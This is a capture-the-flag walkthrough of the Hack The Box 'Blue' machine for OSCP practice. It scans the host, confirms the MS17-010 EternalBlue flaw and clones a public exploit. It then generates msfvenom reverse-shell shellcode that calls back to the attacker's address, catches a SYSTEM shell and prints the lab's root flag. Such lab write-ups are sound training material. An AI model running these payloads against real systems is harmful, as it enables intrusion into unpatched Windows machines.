In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Sun Oct 15 06:28:44 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Blue/results/10.10.10.40/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Blue/results/10.10.10.40/scans/xml/_quick_tcp_nmap.xml 10.10.10.40
Increasing send delay for 10.10.10.40 from 0 to 5 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 5 to 10 due to 19 out of 46 dropped probes since last increase.
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-15 06:28:52 EDT for 117s
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsof0Z syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3372/tcp filtered msdtc no-response
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35502/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 21049/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m55s, deviation: 34m35s, median: 2s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-15T11:30:41+01:00
| smb2-time:
| date: 2023-10-15T10:30:37
|_ start_date: 2023-10-15T10:28:39
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 15 06:30:49 2023 -- 1 IP address (1 host up) scanned in 124.69 seconds
Finger printing with crackmapexec
╭─kali@kali ~
╰─$ crackmapexec smb 10.10.10.40 -u '' -p ''
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\:
╭─kali@kali ~
╰─$
check fof eternalblue vuln
╭─kali@kali ~
╰─$ nmap -p445 --script smb-vuln-ms17-010 10.10.10.40
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 05:21 EDT
Nmap scan report for 10.10.10.40
Host is up (0.35s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds
╭─kali@kali ~
we will use the previous exploit
Creating the exploit
╭─kali@kali ~/HTB/Blue
╰─$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 136, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 136 (delta 46), reused 36 (delta 36), pack-reused 76
Receiving objects: 100% (136/136), 101.12 KiB | 694.00 KiB/s, done.
Resolving deltas: 100% (80/80), done.
╭─kali@kali ~/HTB/Blue
╰─$ ls
AutoBlue-MS17-010 results
╭─kali@kali ~/HTB/Blue
╰─$ cd AutoBlue-MS17-010
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master›
╰─$ ls
eternalblue_exploit10.py eternalblue_exploit8.py LICENSE mysmb.py requirements.txt zzz_exploit.py
eternalblue_exploit7.py eternal_checker.py listener_prep.sh README.md shellcode
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master›
╰─$ cd shellcode
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010/shellcode ‹master›
╰─$ ls
eternalblue_kshellcode_x64.asm eternalblue_kshellcode_x86.asm eternalblue_sc_merge.py shell_prep.sh
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010/shellcode ‹master›
╰─$ ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.31
LPORT you want x64 to listen on:
49155
LPORT you want x86 to listen on:
49155
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.31 LPORT=49155
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.31 LPORT=49155
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Listening and running the exploit
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
╭─kali@kali ~/HTB/Blue/AutoBlue-MS17-010 ‹master●›
╰─$
we have admin
─$ rev 49155
Starting reverse shell listener on IP 10.10.14.31 and port 49155...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 49155 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Directory of C:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
16/10/2023 10:45 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,428,350,464 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
3b4334efd4e41ea43a0c7a654da0dd54
C:\Users\Administrator\Desktop>